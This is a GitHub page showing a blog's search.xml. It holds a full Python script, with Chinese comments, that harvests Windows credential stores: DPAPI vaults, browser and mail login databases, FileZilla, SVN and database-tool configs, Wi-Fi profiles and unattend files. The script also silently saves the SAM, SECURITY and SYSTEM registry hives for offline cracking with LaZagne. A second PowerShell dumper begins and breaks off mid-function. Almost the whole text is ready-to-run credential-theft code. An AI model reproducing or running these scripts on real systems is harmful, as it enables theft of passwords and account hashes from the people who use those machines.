-
Notifications
You must be signed in to change notification settings - Fork 0
/
search.xml
562 lines (396 loc) · 195 KB
/
search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title><![CDATA[dump read]]></title>
<url>http://phpplay.github.io/2018/03/20/dump-read/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="dump-read"><a href="#dump-read" class="headerlink" title="dump read"></a>dump read</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div class="line">144</div><div class="line">145</div><div class="line">146</div><div class="line">147</div><div class="line">148</div><div class="line">149</div><div class="line">150</div><div class="line">151</div><div class="line">152</div><div class="line">153</div><div class="line">154</div><div class="line">155</div><div class="line">156</div><div class="line">157</div><div class="line">158</div><div class="line">159</div><div class="line">160</div><div class="line">161</div><div class="line">162</div><div class="line">163</div><div class="line">164</div><div class="line">165</div><div class="line">166</div><div class="line">167</div><div class="line">168</div><div class="line">169</div><div class="line">170</div><div class="line">171</div><div class="line">172</div><div class="line">173</div><div class="line">174</div><div class="line">175</div><div class="line">176</div><div class="line">177</div><div class="line">178</div><div class="line">179</div><div class="line">180</div><div class="line">181</div><div class="line">182</div><div class="line">183</div><div class="line">184</div><div class="line">185</div><div class="line">186</div><div class="line">187</div><div class="line">188</div><div class="line">189</div><div class="line">190</div><div class="line">191</div><div class="line">192</div><div class="line">193</div><div class="line">194</div><div class="line">195</div><div class="line">196</div><div class="line">197</div><div class="line">198</div><div class="line">199</div><div class="line">200</div><div class="line">201</div><div class="line">202</div><div class="line">203</div><div class="line">204</div><div class="line">205</div><div class="line">206</div><div class="line">207</div><div class="line">208</div><div class="line">209</div><div class="line">210</div><div class="line">211</div><div class="line">212</div><div class="line">213</div><div class="line">214</div><div class="line">215</div><div class="line">216</div><div class="line">217</div><div class="line">218</div><div class="line">219</div><div class="line">220</div><div class="line">221</div><div class="line">222</div><div class="line">223</div><div class="line">224</div><div class="line">225</div><div class="line">226</div><div class="line">227</div><div class="line">228</div><div class="line">229</div><div class="line">230</div><div class="line">231</div><div class="line">232</div><div class="line">233</div><div class="line">234</div><div class="line">235</div><div class="line">236</div><div class="line">237</div><div class="line">238</div><div class="line">239</div><div class="line">240</div><div class="line">241</div><div class="line">242</div><div class="line">243</div><div class="line">244</div><div class="line">245</div><div class="line">246</div><div class="line">247</div><div class="line">248</div><div class="line">249</div><div class="line">250</div><div class="line">251</div><div class="line">252</div><div class="line">253</div><div class="line">254</div><div class="line">255</div><div class="line">256</div><div class="line">257</div><div class="line">258</div><div class="line">259</div><div class="line">260</div><div class="line">261</div><div class="line">262</div><div class="line">263</div><div class="line">264</div><div class="line">265</div><div class="line">266</div><div class="line">267</div><div class="line">268</div><div class="line">269</div><div class="line">270</div><div class="line">271</div><div class="line">272</div><div class="line">273</div><div class="line">274</div><div class="line">275</div><div class="line">276</div><div class="line">277</div><div class="line">278</div><div class="line">279</div><div class="line">280</div><div class="line">281</div><div class="line">282</div><div class="line">283</div><div class="line">284</div><div class="line">285</div><div class="line">286</div><div class="line">287</div><div class="line">288</div><div class="line">289</div><div class="line">290</div><div class="line">291</div><div class="line">292</div><div class="line">293</div><div class="line">294</div><div class="line">295</div><div class="line">296</div><div class="line">297</div><div class="line">298</div><div class="line">299</div><div class="line">300</div><div class="line">301</div><div class="line">302</div><div class="line">303</div><div class="line">304</div><div class="line">305</div><div class="line">306</div><div class="line">307</div><div class="line">308</div><div class="line">309</div><div class="line">310</div><div class="line">311</div><div class="line">312</div><div class="line">313</div><div class="line">314</div><div class="line">315</div><div class="line">316</div><div class="line">317</div></pre></td><td class="code"><pre><div class="line">#!/usr/bin/env python</div><div class="line"># -*- coding: utf-8 -*- </div><div class="line">import _subprocess as sub</div><div class="line">import subprocess</div><div class="line">import shutil</div><div class="line">import json</div><div class="line">import os</div><div class="line"></div><div class="line">user_softwares = [</div><div class="line"> ##################### Data Protection应用程序编程接口(DPAPI) ####################</div><div class="line"> {</div><div class="line"> 'name' : 'DPAPI',</div><div class="line"> 'subfolder' : 'Roaming',</div><div class="line"> 'paths' : [</div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Microsoft\\Protect', # 保护文件夹</div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Microsoft\\Credentials', # #凭证文件夹(域密码等)</div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Microsoft\\Vault', </div><div class="line"> ],</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'DPAPI',</div><div class="line"> 'subfolder' : 'Local',</div><div class="line"> 'paths' : [</div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Local\\Microsoft\\Credentials', </div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Local\\Microsoft\\Vault', # 保险柜文件夹(Internet Explorer密码等)</div><div class="line"> ],</div><div class="line"> },</div><div class="line"></div><div class="line"> ##################### 浏览器 ####################</div><div class="line"> {</div><div class="line"> 'name' : 'Chrome',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Local\\Google\\Chrome\\User Data'],</div><div class="line"> 'profile' : u'Local State',</div><div class="line"> 'files' : [u'Login Data']</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'Coccoc',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Local\\CocCoc\\Browser\\User Data'],</div><div class="line"> 'profile' : u'Local State',</div><div class="line"> 'files' : [u'Login Data']</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'Firefox',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles'],</div><div class="line"> 'files' : [</div><div class="line"> u'key4.db',</div><div class="line"> u'key3.db',</div><div class="line"> u'logins.json',</div><div class="line"> u'cert8.db'</div><div class="line"> ]</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'Opera',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data'],</div><div class="line"> },</div><div class="line"></div><div class="line"></div><div class="line"> ##################### Pidgin聊天 ####################</div><div class="line"> {</div><div class="line"> 'name' : 'Pidgin',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Roaming\\.purple\\accounts.xml'],</div><div class="line"> },</div><div class="line"></div><div class="line"> ##################### 数据库 #####################</div><div class="line"></div><div class="line"> {</div><div class="line"> 'name' : 'Dbvis',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\.dbvis\\config70\\dbvis.xml'],</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'Robomongo',</div><div class="line"> 'paths' : [</div><div class="line"> u'{drive}:\\Users\\{user}\\.config\Robomongo\\robomongo.json', # old version</div><div class="line"> u'{drive}:\\Users\\{user}\\.3T\\robo-3t\\1.1.1\\robo3t.json', # new version</div><div class="line"> ],</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'Squirrel',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\.squirrel-sql\\SQLAliases23.xml'],</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'SQL Developer',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Roaming\\SQL Developer'],</div><div class="line"> },</div><div class="line"></div><div class="line"> ##################### 雷鸟邮件 #####################</div><div class="line"> {</div><div class="line"> 'name' : 'Thunderbird',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Thunderbird\\Profiles'],</div><div class="line"> 'files' : [</div><div class="line"> u'key3.db',</div><div class="line"> u'logins.json',</div><div class="line"> u'cert8.db'</div><div class="line"> ]</div><div class="line"> },</div><div class="line"></div><div class="line"> ##################### SVN #####################</div><div class="line"> {</div><div class="line"> 'name' : 'Tortoise',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Subversion\\auth\\svn.simple'],</div><div class="line"> },</div><div class="line"></div><div class="line"> ##################### Sysadmin #####################</div><div class="line"> {</div><div class="line"> 'name' : 'ApacheDirectoryStudio',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\.ApacheDirectoryStudio\\.metadata\\.plugins\\org.apache.directory.studio.connection.core\\connections.xml'],</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'Filezilla',</div><div class="line"> 'paths' : [</div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Roaming\\FileZilla\\sitemanager.xml', </div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Roaming\\FileZilla\\recentservers.xml', </div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Roaming\\FileZilla\\filezilla.xml'</div><div class="line"> ],</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'FTP Navigator',</div><div class="line"> 'paths' : [u'{drive}:\\FTP Navigator\\Ftplist.txt'],</div><div class="line"> },</div><div class="line"> ]</div><div class="line"></div><div class="line">system_softwares = [</div><div class="line"> ##################### DPAPI ####################</div><div class="line"> {</div><div class="line"> 'name' : 'DPAPI',</div><div class="line"> 'paths' : [</div><div class="line"> u'{drive}:\\Windows\\System32\\Microsoft\\Protect',</div><div class="line"> u'{drive}:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Vault'</div><div class="line"> ],</div><div class="line"> },</div><div class="line"></div><div class="line"> ##################### 无人配置文件 ####################</div><div class="line"> {</div><div class="line"> 'name' : 'Unattended',</div><div class="line"> 'paths' : [</div><div class="line"> u'{drive}:\\Windows\\Panther\\Unattend.xml', </div><div class="line"> u'{drive}:\\Windows\\Panther\\Unattended.xml',</div><div class="line"> u'{drive}:\\Windows\\Panther\\Unattend\\Unattended.xml',</div><div class="line"> u'{drive}:\\Windows\\Panther\\Unattend\\Unattend.xml',</div><div class="line"> u'{drive}:\\Windows\\System32\\\Sysprep\\unattend.xml',</div><div class="line"> u'{drive}:\\Windows\\System32\\Sysprep\\Panther\\unattend.xml',</div><div class="line"></div><div class="line"> ],</div><div class="line"> },</div><div class="line"></div><div class="line"> ##################### Wifi ####################</div><div class="line"> {</div><div class="line"> 'name' : 'Wifi',</div><div class="line"> 'paths' : [</div><div class="line"> u'{drive}:\\ProgramData\\Microsoft\\Wlansvc\\Profiles\\Interfaces', </div><div class="line"> ],</div><div class="line"> },</div><div class="line"> ]</div><div class="line"></div><div class="line"># 获取用户列表以检索他们的密码</div><div class="line">def get_user_list_on_filesystem(drive):</div><div class="line"> # 检查系统中现有的用户(仅获取目录)</div><div class="line"> user_path = u'{drive}:\\Users'.format(drive=drive)</div><div class="line"> all_users = []</div><div class="line"> if os.path.exists(user_path):</div><div class="line"> all_users = os.listdir(user_path)</div><div class="line"> </div><div class="line"> # 删除默认用户</div><div class="line"> for user in [u'All Users', u'Default User', u'Default', u'Public', u'desktop.ini']:</div><div class="line"> if user in all_users:</div><div class="line"> all_users.remove(user)</div><div class="line"></div><div class="line"> return all_users</div><div class="line"></div><div class="line"># 应该在Linux和Windows主机上运行Windows</div><div class="line">def get_basename(path):</div><div class="line"> basename = path.split('\\')</div><div class="line"> return basename[len(basename)-1]</div><div class="line"></div><div class="line">def copy_dir(src, path):</div><div class="line"> dst = '{path}\{src_basename}'.format(path=path, src_basename=get_basename(src))</div><div class="line"> </div><div class="line"> try:</div><div class="line"> if os.path.isdir(src):</div><div class="line"> shutil.copytree(src, dst)</div><div class="line"> else:</div><div class="line"> shutil.copy(src, dst)</div><div class="line"> print '[+] Copied: {src}'.format(src=src)</div><div class="line"> return True</div><div class="line"> except:</div><div class="line"> print '[-] Failed to copied: {src}'.format(src=src)</div><div class="line"> return False</div><div class="line"></div><div class="line">def create_dir(directory):</div><div class="line"> if not os.path.exists(directory):</div><div class="line"> os.makedirs(directory)</div><div class="line"> print '[+] Creating directory: {directory}'.format(directory=directory)</div><div class="line"> return True</div><div class="line"> else:</div><div class="line"> return False</div><div class="line"></div><div class="line"># 只使用文件系统进行脱机检查: http://resources.infosecinstitute.com/registry-forensics-regripper-command-line-linux/</div><div class="line">def run_cmd(cmdline):</div><div class="line"> command = ['cmd.exe', '/c', cmdline]</div><div class="line"> info = subprocess.STARTUPINFO()</div><div class="line"> info.dwFlags = sub.STARTF_USESHOWWINDOW</div><div class="line"> info.wShowWindow = sub.SW_HIDE</div><div class="line"> p = subprocess.Popen(command, startupinfo=info, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, universal_newlines=True)</div><div class="line"> results, _ = p.communicate()</div><div class="line"># 获得一份SYSTEM, SECURITY 和 SAM信息</div><div class="line">def save_hives(directory):</div><div class="line"> create_dir(directory)</div><div class="line"></div><div class="line"> hives = ['sam', 'security', 'system']</div><div class="line"> for h in hives:</div><div class="line"> try:</div><div class="line"> cmd = 'reg.exe save hklm\{hive} {output_name}'.format(hive=h, output_name=os.path.join(directory, h.upper()))</div><div class="line"> run_cmd(cmd)</div><div class="line"> print '[+] Dump {hive_name} hive'.format(hive_name=h)</div><div class="line"> except Exception, e:</div><div class="line"> return False</div><div class="line"> return True</div><div class="line"></div><div class="line"></div><div class="line">def dump(drive= u'C', folder_results=u'dump', zip_folder=False):</div><div class="line"></div><div class="line"> users_folder = os.path.join(folder_results, u'Users')</div><div class="line"> system_folder = os.path.join(folder_results, u'System')</div><div class="line"></div><div class="line"> create_dir(folder_results)</div><div class="line"> create_dir(users_folder)</div><div class="line"> create_dir(system_folder)</div><div class="line"></div><div class="line"> # 循环遍历C:\ Users中可见的所有用户</div><div class="line"> for user in get_user_list_on_filesystem(drive):</div><div class="line"> </div><div class="line"> user_folder = os.path.join(users_folder, user)</div><div class="line"> create_dir(user_folder)</div><div class="line"></div><div class="line"> # 遍历所有由lazagne支持的软件</div><div class="line"> for software in user_softwares:</div><div class="line"> # 获取需要转储的所有文件路径</div><div class="line"> for path in software['paths']:</div><div class="line"> path = path.format(drive=drive, user=user)</div><div class="line"> </div><div class="line"> if os.path.exists(path):</div><div class="line"> software_folder = os.path.join(user_folder, software['name'])</div><div class="line"> if 'subfolder' in software:</div><div class="line"> software_folder = os.path.join(software_folder, software['subfolder'])</div><div class="line"> </div><div class="line"> create_dir(software_folder)</div><div class="line"> </div><div class="line"> # 管理软件异常:转储多个配置文件</div><div class="line"> if software['name'] == 'Firefox' or software['name'] == 'Thunderbird':</div><div class="line"> for profile in os.listdir(path):</div><div class="line"> profile_folder = os.path.join(software_folder, profile)</div><div class="line"> create_dir(profile_folder)</div><div class="line"> for file in software['files']:</div><div class="line"> src = os.path.join(path, profile, file)</div><div class="line"> copy_dir(src, profile_folder)</div><div class="line"></div><div class="line"> elif software['name'] == 'Chrome' or software['name'] == 'Coccoc':</div><div class="line"> profiles = []</div><div class="line"> if os.path.exists(os.path.join(path, software['profile'])):</div><div class="line"> with open(os.path.join(path, software['profile'])) as file: </div><div class="line"> data = json.load(file)</div><div class="line"> for profile in data['profile']['info_cache']:</div><div class="line"> profiles.append(profile)</div><div class="line"> </div><div class="line"> for profile in profiles:</div><div class="line"> profile_folder = os.path.join(software_folder, profile)</div><div class="line"> create_dir(profile_folder)</div><div class="line"> for file in software['files']:</div><div class="line"> src = os.path.join(path, profile, file)</div><div class="line"> copy_dir(src, profile_folder)</div><div class="line"></div><div class="line"> # 管理软件异常:当文件名称在版本之间改变时</div><div class="line"> elif software['name'] == 'SQL Developer':</div><div class="line"> new_directory = ''</div><div class="line"> for p in os.listdir(path):</div><div class="line"> # 一个子目录以systemxxxx开头</div><div class="line"> if p.startswith('system'):</div><div class="line"> new_directory = os.path.join(path, p)</div><div class="line"></div><div class="line"> for p in os.listdir(new_directory):</div><div class="line"> if p.startswith(u'o.sqldeveloper'):</div><div class="line"> xml_file = os.path.join(new_directory, p, u'product-preferences.xml')</div><div class="line"> if os.path.exists(xml_file):</div><div class="line"> copy_dir(xml_file, software_folder)</div><div class="line"></div><div class="line"> if p.startswith(u'o.jdeveloper'):</div><div class="line"> xml_file = os.path.join(new_directory, p, u'connections.xml')</div><div class="line"> if os.path.exists(xml_file):</div><div class="line"> copy_dir(xml_file, software_folder)</div><div class="line"> break</div><div class="line"></div><div class="line"> # 复制软件的文件无一例外</div><div class="line"> else:</div><div class="line"> copy_dir(path, software_folder)</div><div class="line"></div><div class="line"></div><div class="line"> # 系统信息</div><div class="line"> for software in system_softwares:</div><div class="line"> # 获取需要转储的所有文件路径</div><div class="line"> for path in software['paths']:</div><div class="line"> path = path.format(drive=drive)</div><div class="line"> </div><div class="line"> if os.path.exists(path):</div><div class="line"> software_folder = os.path.join(system_folder, software['name'])</div><div class="line"> create_dir(software_folder)</div><div class="line"> copy_dir(path, software_folder)</div><div class="line"></div><div class="line"> save_hives(directory=os.path.join(system_folder, 'Hives'))</div><div class="line"></div><div class="line"> if not zip_folder:</div><div class="line"> print '[+] Directory created: {directory}'.format(directory=folder_results)</div><div class="line"></div><div class="line"></div><div class="line">if __name__ == '__main__':</div><div class="line"> file = 'dump'</div><div class="line"> </div><div class="line"> dump(folder_results=file)</div></pre></td></tr></table></figure>
<hr>
<h2 id="powershell-dump-script"><a href="#powershell-dump-script" class="headerlink" title="powershell dump script"></a>powershell dump script</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div class="line">144</div><div class="line">145</div><div class="line">146</div><div class="line">147</div><div class="line">148</div><div class="line">149</div><div class="line">150</div><div class="line">151</div><div class="line">152</div><div class="line">153</div><div class="line">154</div><div class="line">155</div><div class="line">156</div><div class="line">157</div><div class="line">158</div><div class="line">159</div><div class="line">160</div><div class="line">161</div><div class="line">162</div><div class="line">163</div><div class="line">164</div><div class="line">165</div><div class="line">166</div><div class="line">167</div><div class="line">168</div><div class="line">169</div><div class="line">170</div><div class="line">171</div><div class="line">172</div><div class="line">173</div><div class="line">174</div><div class="line">175</div><div class="line">176</div><div class="line">177</div><div class="line">178</div><div class="line">179</div><div class="line">180</div><div class="line">181</div><div class="line">182</div><div class="line">183</div><div class="line">184</div><div class="line">185</div><div class="line">186</div><div class="line">187</div><div class="line">188</div><div class="line">189</div><div class="line">190</div><div class="line">191</div><div class="line">192</div><div class="line">193</div><div class="line">194</div><div class="line">195</div><div class="line">196</div><div class="line">197</div><div class="line">198</div><div class="line">199</div><div class="line">200</div><div class="line">201</div><div class="line">202</div><div class="line">203</div><div class="line">204</div><div class="line">205</div><div class="line">206</div><div class="line">207</div><div class="line">208</div><div class="line">209</div><div class="line">210</div><div class="line">211</div><div class="line">212</div><div class="line">213</div><div class="line">214</div><div class="line">215</div><div class="line">216</div><div class="line">217</div><div class="line">218</div><div class="line">219</div><div class="line">220</div><div class="line">221</div><div class="line">222</div><div class="line">223</div><div class="line">224</div><div class="line">225</div><div class="line">226</div><div class="line">227</div><div class="line">228</div><div class="line">229</div><div class="line">230</div><div class="line">231</div><div class="line">232</div><div class="line">233</div><div class="line">234</div><div class="line">235</div><div class="line">236</div><div class="line">237</div><div class="line">238</div><div class="line">239</div><div class="line">240</div><div class="line">241</div><div class="line">242</div><div class="line">243</div><div class="line">244</div><div class="line">245</div><div class="line">246</div><div class="line">247</div><div class="line">248</div><div class="line">249</div><div class="line">250</div><div class="line">251</div><div class="line">252</div><div class="line">253</div><div class="line">254</div><div class="line">255</div><div class="line">256</div><div class="line">257</div><div class="line">258</div><div class="line">259</div><div class="line">260</div><div class="line">261</div><div class="line">262</div><div class="line">263</div><div class="line">264</div><div class="line">265</div><div class="line">266</div><div class="line">267</div><div class="line">268</div><div class="line">269</div><div class="line">270</div><div class="line">271</div><div class="line">272</div><div class="line">273</div><div class="line">274</div><div class="line">275</div><div class="line">276</div><div class="line">277</div><div class="line">278</div><div class="line">279</div><div class="line">280</div><div class="line">281</div><div class="line">282</div><div class="line">283</div><div class="line">284</div><div class="line">285</div><div class="line">286</div><div class="line">287</div><div class="line">288</div><div class="line">289</div><div class="line">290</div><div class="line">291</div><div class="line">292</div><div class="line">293</div><div class="line">294</div><div class="line">295</div><div class="line">296</div><div class="line">297</div><div class="line">298</div><div class="line">299</div><div class="line">300</div><div class="line">301</div><div class="line">302</div><div class="line">303</div><div class="line">304</div><div class="line">305</div><div class="line">306</div><div class="line">307</div><div class="line">308</div><div class="line">309</div><div class="line">310</div><div class="line">311</div><div class="line">312</div><div class="line">313</div><div class="line">314</div><div class="line">315</div><div class="line">316</div><div class="line">317</div><div class="line">318</div><div class="line">319</div><div class="line">320</div><div class="line">321</div><div class="line">322</div><div class="line">323</div><div class="line">324</div><div class="line">325</div><div class="line">326</div><div class="line">327</div><div class="line">328</div><div class="line">329</div><div class="line">330</div><div class="line">331</div><div class="line">332</div><div class="line">333</div><div class="line">334</div><div class="line">335</div><div class="line">336</div><div class="line">337</div><div class="line">338</div><div class="line">339</div><div class="line">340</div><div class="line">341</div><div class="line">342</div><div class="line">343</div><div class="line">344</div><div class="line">345</div><div class="line">346</div><div class="line">347</div><div class="line">348</div><div class="line">349</div><div class="line">350</div><div class="line">351</div><div class="line">352</div><div class="line">353</div><div class="line">354</div><div class="line">355</div><div class="line">356</div><div class="line">357</div><div class="line">358</div><div class="line">359</div><div class="line">360</div><div class="line">361</div><div class="line">362</div><div class="line">363</div><div class="line">364</div><div class="line">365</div><div class="line">366</div><div class="line">367</div><div class="line">368</div><div class="line">369</div><div class="line">370</div><div class="line">371</div><div class="line">372</div><div class="line">373</div><div class="line">374</div><div class="line">375</div><div class="line">376</div><div class="line">377</div><div class="line">378</div><div class="line">379</div><div class="line">380</div><div class="line">381</div></pre></td><td class="code"><pre><div class="line"></div><div class="line">function CheckFiles($dst, $user, $d) </div><div class="line">{</div><div class="line"> for ($i=0; $i -lt $d['paths'].length; $i++) {</div><div class="line"> </div><div class="line"> $path = $d['paths'][$i].replace('[USER]', $user)</div><div class="line"> # 如果没有找到配置文件,请不要创建目录</div><div class="line"> if ((Test-Path $path))</div><div class="line"> {</div><div class="line"> if (!(Test-Path $dst))</div><div class="line"> {</div><div class="line"> CreateDir($dst)</div><div class="line"> }</div><div class="line"> CopyFile $path $dst</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line"># 管理多个档案</div><div class="line">function ManageMozilla($root, $user, $d){</div><div class="line"> $mozilla_software_path = $d['paths'].replace('[USER]', $user)</div><div class="line"></div><div class="line"> if (Test-Path $mozilla_software_path) {</div><div class="line"> $mozilla_folder 